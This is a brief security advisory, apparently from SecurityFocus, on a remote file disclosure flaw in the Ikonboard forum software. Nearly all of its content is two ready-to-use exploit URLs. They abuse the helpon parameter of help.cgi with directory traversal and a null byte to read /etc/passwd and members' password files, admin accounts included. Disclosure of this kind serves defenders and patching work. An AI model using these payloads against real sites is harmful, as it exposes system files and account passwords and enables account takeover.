Ikonboard Remote File Disclosure Vulnerability

Example:

http://www.example.com/cgi-bin/ikonboard/help.cgi?helpon=../../../../../etc/passwd%00

will disclose /etc/passwd, if readable by the webserver.

http://www.example.com/cgi-bin/ikonboard/help.cgi?helpon=../members/[member].cgi%00

discloses the ikonboard account password for [member], including admin acounts.


 

Privacy Statement
Copyright 2010, SecurityFocus